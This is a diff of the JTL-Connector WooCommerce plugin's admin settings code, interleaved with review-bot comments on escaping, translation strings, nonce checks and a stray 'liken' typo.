                 They help you to process more orders in a shorter time and offer a range of exciting functionalities.
                 Basic information and credentials of the installed JTL-Connector. It is needed to configure the
                 JTL-Connector in the jtl customer center and JTL-Wawi.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1014,37 +1038,19 @@
             'type'      => 'connector_url',
             'helpBlock' => __(
                 'This URL should be placed in the JTL-Customer-Center and in your JTL-Wawi as "Onlineshop-URL".',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => 'connector_url',
-            'value'     => sprintf(
-                '%s%s%s',
-                $protocol = isset($_SERVER['HTTPS'])
-                            && ( $_SERVER['HTTPS'] == 'on'
-                                 || $_SERVER['HTTPS'] == 1 )
-                            || isset($_SERVER['HTTP_X_FORWARDED_PROTO'])
-                               && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'
-                    ? 'https://' : 'http://',
-                str_replace(
-                    'http://',
-                    '',
-                    str_replace(
-                        'https://',
-                        '',
-                        get_bloginfo('url')
-                    )
-                ),
-                '/index.php/jtlconnector/'
-            ),
+            'value'     => esc_url(get_bloginfo('url') . '/index.php/jtlconnector/'),
         ];

         //Add connector password field
         $fields[] = [
-            'title'     => __('Connector Password', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Connector Password', 'woo-jtl-connector'),
             'type'      => 'connector_password',
             'helpBlock' => __(
                 'This secret password will be used for identifying that your JTL-Wawi ist allowed to pull/push data.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => 'connector_password',
             'value'     => Config::get(Config::OPTIONS_TOKEN),
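Review bot: the connector_url value now takes its scheme from get_bloginfo('url') instead of $_SERVER['HTTPS'] and $_SERVER['HTTP_X_FORWARDED_PROTO']. Dropping the request header is the right call, but it changes what is displayed on sites that terminate TLS at a proxy while the stored site URL is still http://, so the shown "Onlineshop-URL" can differ from what 2.4.1 displayed. That deserves a changelog entry and a short comment next to the new line.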
@@ -1054,7 +1060,7 @@
         $fields[] = [
             'title'     => 'Connector Version',
             'type'      => 'paragraph',
-            'helpBlock' => __('This is your current installed connector version.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('This is your current installed connector version.', 'woo-jtl-connector'),
             'desc'      => Config::get(Config::OPTIONS_INSTALLED_VERSION),
         ];

@@ -1066,7 +1072,7 @@
         //Add extend plugin informations
         if (count(SupportedPlugins::getSupported()) > 0) {
             $fields[] = [
-                'title'   => __('These activated plugins extend the JTL-Connector:', JTLWCC_TEXT_DOMAIN),
+                'title'   => __('These activated plugins extend the JTL-Connector:', 'woo-jtl-connector'),
                 'type'    => 'compatible_plugins_field',
                 'plugins' => SupportedPlugins::getSupported(),
             ];
@@ -1074,13 +1080,13 @@

         //Add Incompatible plugin informations
         $fields[] = [
-            'title'   => __('Incompatible with these plugins:', JTLWCC_TEXT_DOMAIN),
+            'title'   => __('Incompatible with these plugins:', 'woo-jtl-connector'),
             'type'    => 'not_compatible_plugins_field',
             'plugins' => SupportedPlugins::getNotSupportedButActive(false, true, true),
         ];

         $fields[] = [
-            'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+            'title'      => __('Important information', 'woo-jtl-connector'),
             'type'       => 'jtlwcc_card',
             'color'      => 'border-warning',
             'text-color' => 'text-warning',
@@ -1088,7 +1094,7 @@
             'text'       => __(
                 'Similar plugins, like the <b>not compatible plugins</b> which
                     are listed here, might be incompatible too!',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1112,7 +1118,9 @@
             if (is_string($notSupportedButActiveAsString)) {
                 self::jtlwcc_show_wordpress_error(
                     sprintf(
-                        __('The listed plugins can cause problems when using the connector: %s', JTLWCC_TEXT_DOMAIN),
+                        // translators: %s: list of unsupported plugin names
+
+                        __('The listed plugins can cause problems when using the connector: %s', 'woo-jtl-connector'),
                         $notSupportedButActiveAsString
                     )
                 );
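Review bot: the added "// translators:" comment inside sprintf() is separated from the __() call by an empty added line. String extraction and the coding-standard sniff expect the comment on the line directly above the gettext call, so with the gap it will likely not be attached to this msgid. Remove the blank line so the comment and the __() line are adjacent.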
@@ -1128,7 +1136,8 @@
     public static function jtlwcc_show_wordpress_error(string $message): void //phpcs:ignore
     {
         echo '<div class="alert alert-danger" id="jtlwcc_plugin_error" role="alert">
-                    <p><b>JTL-Connector:</b> ' . $message . '</p>
+                    <p><b>JTL-Connector:</b> '
+                    . wp_kses_post($message) . '</p>
                 </div>';
     }

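Review bot: wp_kses_post() on $message in jtlwcc_show_wordpress_error() still permits the full post-content tag set (links, images and so on), which is wider than an error banner needs. The caller visible above passes a translated sentence plus a plugin-name list, so esc_html(), or a wp_kses() call with a short allow-list if emphasis tags are required, would be the tighter choice. The bare //phpcs:ignore on the signature line suppresses every sniff for that line; name the specific rule being ignored.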
@@ -1148,7 +1157,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop
                 with the free JTL-Wawi ERP system by JTL-Software. These are the advanced settings of the
                 installed JTL-Connector. Here you can configure how some data is handled while push/pull.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1159,73 +1168,73 @@

         //Add variation specific radio field
         $fields[] = [
-            'title'     => __('Variation specifics', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Variation specifics', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to show your customers the variation as specific (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_SHOW_VARIATION_SPECIFICS_ON_PRODUCT_PAGE,
             'value'     => Config::get(Config::OPTIONS_SHOW_VARIATION_SPECIFICS_ON_PRODUCT_PAGE),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         $fields[] = [
-            'title'     => __('Delete unknown attributes', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Delete unknown attributes', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to delete unknown attributes on push (Default : Disabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DELETE_UNKNOWN_ATTRIBUTES,
             'value'     => Config::get(Config::OPTIONS_DELETE_UNKNOWN_ATTRIBUTES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add custom properties radio field
         $fields[] = [
-            'title'     => __('Custom properties', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Custom properties', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'If you activate this option, custom fields from JTL-Wawi will be handled
                 as attributes in the shop. After changing this option, full-sync is required (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_SEND_CUSTOM_PROPERTIES,
             'value'     => Config::get(Config::OPTIONS_SEND_CUSTOM_PROPERTIES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add gtin/ean radio field
         $fields[] = [
-            'title'     => __('GTIN / EAN', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('GTIN / EAN', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to use the GTIN field for ean.
                 (Default : Enabled / Required plugin: WooCommerce Germanized).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_USE_GTIN_FOR_EAN,
             'value'     => Config::get(Config::OPTIONS_USE_GTIN_FOR_EAN),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Allow html in attributes
         $fields[] = [
-            'title'     => __('Allow HTML in product attributes', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Allow HTML in product attributes', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want to allow saving HTML in product attributes (Default : Disabled)',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_ALLOW_HTML_IN_PRODUCT_ATTRIBUTES,
             'value'     => Config::get(Config::OPTIONS_ALLOW_HTML_IN_PRODUCT_ATTRIBUTES),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add sectionend
@@ -1253,7 +1262,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop
                 with the free JTL-Wawi ERP system by JTL-Software. Delivery time related settings of the
                 installed JTL-Connector. Here you can set some options to modify the pull/psuh of delivery times.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1264,14 +1273,14 @@

         //Add delivery time calculation radio field
         $fields[] = [
-            'title'     => __('DeliveryTime Calculation', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('DeliveryTime Calculation', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_select',
             'id'        => Config::OPTIONS_USE_DELIVERYTIME_CALC,
             'value'     => Config::get(Config::OPTIONS_USE_DELIVERYTIME_CALC),
             'options'   => [
-                'delivery_time_calc' => __('Lieferzeit Berechnung nutzen', JTLWCC_TEXT_DOMAIN),
-                'delivery_status'    => __('Lieferstatus nutzen', JTLWCC_TEXT_DOMAIN),
-                'deactivated'        => __('Deaktiviert', JTLWCC_TEXT_DOMAIN),
+                'delivery_time_calc' => __('Lieferzeit Berechnung nutzen', 'woo-jtl-connector'),
+                'delivery_status'    => __('Lieferstatus nutzen', 'woo-jtl-connector'),
+                'deactivated'        => __('Deaktiviert', 'woo-jtl-connector'),
             ],
             'helpBlock' => __(
                 "Enable if you want to use delivery time calculation. <br>
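Review bot: the three 'options' entries keep German source strings ('Lieferzeit Berechnung nutzen', 'Lieferstatus nutzen', 'Deaktiviert') as msgids, while every other string touched in these hunks is English. With the text domain now a literal and the strings extractable, non-German locales will show German here unless each one overrides it. Use English msgids that match the helpBlock wording (delivery time calculation, delivery status, deactivated) and ship the German text in the de_DE catalogue.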
@@ -1279,55 +1288,55 @@
                         Delivery status: Use the delivery status as delivery time. <br>
                         Deactivated: Don't use delivery time. <br>
                         (Default : Delivery time calculation / Required plugin: WooCommerce Germanized).",
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //Add dont use zero values radio field
         $fields[] = [
-            'title'     => __('Dont use zero values for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Dont use zero values for delivery time', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you dont want to use zero values for delivery time. (Default : Enabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DISABLED_ZERO_DELIVERY_TIME,
             'value'     => Config::get(Config::OPTIONS_DISABLED_ZERO_DELIVERY_TIME),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add prefix for delivery time textinput field
         $fields[] = [
-            'title'     => __('Prefix for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Prefix for delivery time', 'woo-jtl-connector'),
             'type'      => 'jtl_text_input',
             'id'        => Config::OPTIONS_PRAEFIX_DELIVERYTIME,
             'value'     => Config::get(Config::OPTIONS_PRAEFIX_DELIVERYTIME),
-            'helpBlock' => __("Define the prefix like" . PHP_EOL . "'ca. 4 Days'.", JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __("Define the prefix liken'ca. 4 Days'.", 'woo-jtl-connector'),
         ];

         //Add suffix for delivery time textinput field
         $fields[] = [
-            'title'     => __('Suffix for delivery time', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Suffix for delivery time', 'woo-jtl-connector'),
             'type'      => 'jtl_text_input',
             'id'        => Config::OPTIONS_SUFFIX_DELIVERYTIME,
             'value'     => Config::get(Config::OPTIONS_SUFFIX_DELIVERYTIME),
-            'helpBlock' => __("Define the Suffix like" . PHP_EOL . "'ca. 4 work days'.", JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __("Define the Suffix liken'ca. 4 work days'.", 'woo-jtl-connector'),
         ];

         //Use next available inflow date if needed
         $fields[] = [
-            'title'     => __('Consider available inflow date for shipping', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Consider available inflow date for shipping', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable if you want that connector calculate shipping time based on next a
                 vailable inflow date from supplier when stock is 0',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_CONSIDER_SUPPLIER_INFLOW_DATE,
             'value'     => Config::get(Config::OPTIONS_CONSIDER_SUPPLIER_INFLOW_DATE),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add sectionend
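Review bot: the two new helpBlock lines read "Define the prefix liken'ca. 4 Days'." and "Define the Suffix liken'ca. 4 work days'.", so the line break that the removed PHP_EOL concatenation produced has become a stray "n" glued onto "like". Replacing the concatenation with a single literal is correct for string extraction, but the literal needs either a plain space or a real break, for example "Define the prefix like 'ca. 4 Days'.". In the same hunk, the unchanged 'desc' for the inflow-date option is split mid-word ("next a" / "vailable") across two source lines, which puts a newline and indentation inside the msgid.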
@@ -1354,7 +1363,7 @@
                 'With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop with the
                 free JTL-Wawi ERP system by JTL-Software. Customer order related settings of the installed
                 JTL-Connector. Here you can set some options to modify the import of customer orders.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1367,27 +1376,27 @@

         //Add pull order since date field
         $fields[] = [
-            'title'     => __('Pull orders since', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Pull orders since', 'woo-jtl-connector'),
             'type'      => 'jtl_date_field',
             // 'default'  => '2019-03-22',
             'value'     => Config::get(Config::OPTIONS_PULL_ORDERS_SINCE),
-            'helpBlock' => __('Define a start date for pulling of orders.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('Define a start date for pulling of orders.', 'woo-jtl-connector'),
             'id'        => Config::OPTIONS_PULL_ORDERS_SINCE,
         ];
         $fields[] = [
-            'title'     => __('Recalculate order when has coupons', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Recalculate order when has coupons', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'When option is enabled, connector will recalculate order when coupons were applied to order.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_RECALCULATE_COUPONS_ON_PULL,
             'value'     => Config::get(Config::OPTIONS_RECALCULATE_COUPONS_ON_PULL),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];
         $fields[] = [
-            'title'     => __('Default order statuses to import', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Default order statuses to import', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_multiselect',
             'options'   => wc_get_order_statuses(),
             'id'        => Config::OPTIONS_DEFAULT_ORDER_STATUSES_TO_IMPORT,
@@ -1397,7 +1406,7 @@
             ),
             'helpBlock' => __(
                 'Order statuses that should be imported. Default: pending, processing, on hold, completed',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1411,7 +1420,7 @@
             'title'   => __(
                 'Import payments with following payment types only when order
                 is completed (usually manual payment types)',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'type'    => 'jtl_connector_multiselect',
             'options' => $paymentGateways,
@@ -1423,23 +1432,23 @@
         ];

         $fields[] = [
-            'title'     => __('Delay time in seconds before order import'),
+            'title'     => __('Delay time in seconds before order import', 'woo-jtl-connector'),
             'type'      => 'jtl_number_input',
             'value'     => Config::get(Config::OPTIONS_IGNORE_ORDERS_YOUNGER_THAN),
-            'helpBlock' => __('Define the delay time in seconds before new orders get imported.', JTLWCC_TEXT_DOMAIN),
+            'helpBlock' => __('Define the delay time in seconds before new orders get imported.', 'woo-jtl-connector'),
             'id'        => Config::OPTIONS_IGNORE_ORDERS_YOUNGER_THAN,
         ];

         //Add custom checkout fields input field
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_CHECKOUT_FIELD_EDITOR_FOR_WOOCOMMERCE)) {
             $fields[] = [
-                'title'     => __('Custom Checkout Fields', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Custom Checkout Fields', 'woo-jtl-connector'),
                 'type'      => 'jtl_text_input',
                 'id'        => Config::OPTIONS_CUSTOM_CHECKOUT_FIELDS,
                 'value'     => Config::get(Config::OPTIONS_CUSTOM_CHECKOUT_FIELDS),
                 'helpBlock' => __(
                     "Define what custom fields should be imported to Wawi. Comma-separated.",
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];
         }
@@ -1466,10 +1475,7 @@

         $fields[] = [
             'type' => 'title',
-            'desc' => __(
-                '',
-                JTLWCC_TEXT_DOMAIN
-            ),
+            'desc' => '',
         ];


@@ -1478,7 +1484,7 @@
         ];

         $fields[] = [
-            'title'     => __('Limit Customer Pull', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Limit Customer Pull', 'woo-jtl-connector'),
             'type'      => 'jtl_connector_select',
             'id'        => Config::OPTIONS_LIMIT_CUSTOMER_QUERY_TYPE,
             'value'     => Config::get(
@@ -1486,10 +1492,10 @@
                 Config::JTLWCC_CONFIG_DEFAULTS[ Config::OPTIONS_LIMIT_CUSTOMER_QUERY_TYPE ]
             ),
             'options'   => [
-                'no_filter'           => __('No Limit', JTLWCC_TEXT_DOMAIN),
-                'last_imported_order' => __('Since last pulled Order ID', JTLWCC_TEXT_DOMAIN),
-                'not_imported'        => __('Only from not pulled Order', JTLWCC_TEXT_DOMAIN),
-                'fixed_date'          => __('Since fixed Date', JTLWCC_TEXT_DOMAIN),
+                'no_filter'           => __('No Limit', 'woo-jtl-connector'),
+                'last_imported_order' => __('Since last pulled Order ID', 'woo-jtl-connector'),
+                'not_imported'        => __('Only from not pulled Order', 'woo-jtl-connector'),
+                'fixed_date'          => __('Since fixed Date', 'woo-jtl-connector'),
             ],
             'helpBlock' => __(
                 '"No Limit" will Pull all Users in the User Group "Customers" (with B2B Market, define Groups below),
@@ -1505,7 +1511,7 @@
                                 Timeout Errors in JTL-WAWI. <br><br>
                                 Speeds decreases linearly with the number of Customers and/or Orders
                                 except for "Only from not pulled Order" which decreases exponentially.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

@@ -1531,7 +1537,7 @@
             }

             $fields[] = [
-                'title'     => __('Customer Groups to Pull (only with no Limit)', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Customer Groups to Pull (only with no Limit)', 'woo-jtl-connector'),
                 'type'      => 'jtl_connector_multiselect',
                 'options'   => $roles,
                 'id'        => Config::OPTIONS_PULL_CUSTOMER_GROUPS,
@@ -1539,7 +1545,7 @@
                 'helpBlock' => __(
                     'Pull Customers with this Customer Groups, only respected if no Limit is defined.
                     <br> Guests are always pulled. ',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];

@@ -1556,12 +1562,12 @@


             $fields[] = [
-                'title'     => __('B2B-Market/WooCommerce default customer group', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('B2B-Market/WooCommerce default customer group', 'woo-jtl-connector'),
                 'type'      => 'jtl_connector_select',
                 'id'        => Config::OPTIONS_DEFAULT_CUSTOMER_GROUP,
                 'value'     => Config::get(Config::OPTIONS_DEFAULT_CUSTOMER_GROUP),
                 'options'   => $options,
-                'helpBlock' => __('Define which customer group is default.', JTLWCC_TEXT_DOMAIN),
+                'helpBlock' => __('Define which customer group is default.', 'woo-jtl-connector'),
             ];
         }

@@ -1590,47 +1596,47 @@
                 with the free JTL-Wawi ERP system by JTL-Software. Developer related settings of
                 the installed JTL-Connector. Here you can enable/disable/reset/download the
                 developer logs of the jtl connector.',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //Add dev log radio field
         $fields[] = [
-            'title'     => __('Dev-Logs', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Dev-Logs', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'Enable JTL-Connector dev-logs for debugging (Default : Disabled).',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_DEVELOPER_LOGGING,
             'value'     => Config::get(Config::OPTIONS_DEVELOPER_LOGGING),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];

         //Add dev log buttons
         $fields[] = [
             'type'          => 'dev_log_btn',
-            'downloadText'  => __('Download', JTLWCC_TEXT_DOMAIN),
-            'clearLogsText' => __('Clear logs', JTLWCC_TEXT_DOMAIN),
+            'downloadText'  => __('Download', 'woo-jtl-connector'),
+            'clearLogsText' => __('Clear logs', 'woo-jtl-connector'),
         ];

         $fields[] = [
-            'title'     => __('Recommend WooCommerce Settings', JTLWCC_TEXT_DOMAIN),
+            'title'     => __('Recommend WooCommerce Settings', 'woo-jtl-connector'),
             'type'      => 'active_true_false_radio',
             'desc'      => __(
                 'JTL-Wawi set automatically stable settings (Default : Enabled).
                 Disable this at your own risk!',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
             'id'        => Config::OPTIONS_AUTO_WOOCOMMERCE_OPTIONS,
             'value'     => Config::get(Config::OPTIONS_AUTO_WOOCOMMERCE_OPTIONS),
-            'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-            'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+            'trueText'  => __('Enabled', 'woo-jtl-connector'),
+            'falseText' => __('Disabled', 'woo-jtl-connector'),
         ];
         //phpcs:disable
         $fields[] = [
-            'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+            'title'      => __('Important information', 'woo-jtl-connector'),
             'type'       => 'jtlwcc_card',
             'color'      => 'border-info',
             'text-color' => 'text-danger',
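Review bot: the 'dev_log_btn' field still carries only 'downloadText' and 'clearLogsText'; nothing in this hunk hands a nonce to the buttons that trigger the log download and clear actions. Since the advisory names those two AJAX actions as unauthenticated-by-capability entry points, the field should pass a value from wp_create_nonce() to the front end, and the handlers (not visible in this diff) should call check_ajax_referer() and current_user_can() before touching the logs. If that was done in another file, a comment here pointing to it would make the fix reviewable.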
@@ -1642,27 +1648,27 @@
                  <li class="list-group-item bg-transparent">Display prices in the shop: "Including tax" (Dont change this!)</li>
                  <li class="list-group-item bg-transparent">Display prices during cart and checkout: "Including tax" (Dont change this!)</li>
                  </ul>',
-                JTLWCC_TEXT_DOMAIN
+                'woo-jtl-connector'
             ),
         ];

         //phpcs:enable
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_GERMAN_MARKET)) {
             $fields[] = [
-                'title'     => __('Recommend German Market Settings', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Recommend German Market Settings', 'woo-jtl-connector'),
                 'type'      => 'active_true_false_radio',
                 'desc'      => __(
                     'JTL-Wawi set automatically stable settings (Default : Enabled). Disable this at your own risk!',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
                 'id'        => Config::OPTIONS_AUTO_GERMAN_MARKET_OPTIONS,
                 'value'     => Config::get(Config::OPTIONS_AUTO_GERMAN_MARKET_OPTIONS),
-                'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-                'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+                'trueText'  => __('Enabled', 'woo-jtl-connector'),
+                'falseText' => __('Disabled', 'woo-jtl-connector'),
             ];
             //phpcs:disable
             $fields[] = [
-                'title'      => __('Important information', JTLWCC_TEXT_DOMAIN),
+                'title'      => __('Important information', 'woo-jtl-connector'),
                 'type'       => 'jtlwcc_card',
                 'color'      => 'border-info',
                 'text-color' => 'text-danger',
@@ -1697,7 +1703,7 @@
                     <li class="list-group-item bg-transparent">Global Options > Prorated Tax Calculation For Fees & Shipping Cost: "On" (Dont change this!)</li>
                     <li class="list-group-item bg-transparent">Global Options > Gross Shipping Costs and Gross Fees: "Off"</li>
                     </ul>',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
             ];
             //phpcs:enable
@@ -1706,19 +1712,19 @@
         //CURRENT DISBALED THIS
         if (SupportedPlugins::isActive(SupportedPlugins::PLUGIN_B2B_MARKET)) {
             $fields[] = [
-                'title'     => __('Recommend B2B Market Settings', JTLWCC_TEXT_DOMAIN),
+                'title'     => __('Recommend B2B Market Settings', 'woo-jtl-connector'),
                 'type'      => 'active_true_false_radio',
                 'desc'      => __(
                     'JTL-Wawi set automatically stable settings (Default : Enabled). Disable this at your own risk!',
-                    JTLWCC_TEXT_DOMAIN
+                    'woo-jtl-connector'
                 ),
                 'id'        => Config::OPTIONS_AUTO_B2B_MARKET_OPTIONS,
                 'value'     => Config::get(Config::OPTIONS_AUTO_B2B_MARKET_OPTIONS),
-                'trueText'  => __('Enabled', JTLWCC_TEXT_DOMAIN),
-                'falseText' => __('Disabled', JTLWCC_TEXT_DOMAIN),
+                'trueText'  => __('Enabled', 'woo-jtl-connector'),
+                'falseText' => __('Disabled', 'woo-jtl-connector'),
             ];
 // $fields[] = [
-// 'title' => __('Important information', JTLWCC_TEXT_DOMAIN),
+// 'title' => __('Important information', 'woo-jtl-connector'),
 // 'type' => 'jtlwcc_card',
 // 'color' => 'border-info',
 // 'text-color' => 'text-info',
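Review bot: the change to the 'title' line here lands inside a block that is entirely commented out, under a context comment that reads "CURRENT DISBALED THIS". Editing dead code keeps it looking maintained without it ever running; delete the commented-out $fields[] entry, or restore it, and fix the comment wording to say why the card is disabled.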
@@ -1759,35 +1765,35 @@
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-information"><?php print __(
                        'Information',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'advanced_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-advanced"><?php print __(
                        'Advanced Settings',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'delivery_time_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-delivery-time"><?php print __(
                        'Delivery times',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'customer_order_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-customer-order"><?php print __(
                        'Customer orders',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (strcmp($page, 'customers_page') === 0) {
                     print 'active';
                                                                } ?>"
                    href="admin.php?page=woo-jtl-connector-customers"><?php print __(
                        'Customers',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link <?php if (
                     strcmp(
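Review bot: every navigation label in this hunk is still emitted with print __(...), so the translated string reaches the page unescaped even though the same patch adds output escaping elsewhere. Translation files are an input like any other; switch these to esc_html_e('Information', 'woo-jtl-connector') and the equivalent for the other tabs, which also removes the print.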
@@ -1798,13 +1804,13 @@
                    } ?>"
                    href="admin.php?page=woo-jtl-connector-developer-settings"><?php print __(
                        'Developer Settings',
-                       JTLWCC_TEXT_DOMAIN
+                       'woo-jtl-connector'
                    ); ?></a>
                 <a class="flex-sm-fill text-sm-center nav-link"
                    href="https://guide.jtl-software.de/jtl-connector/woocommerce/"
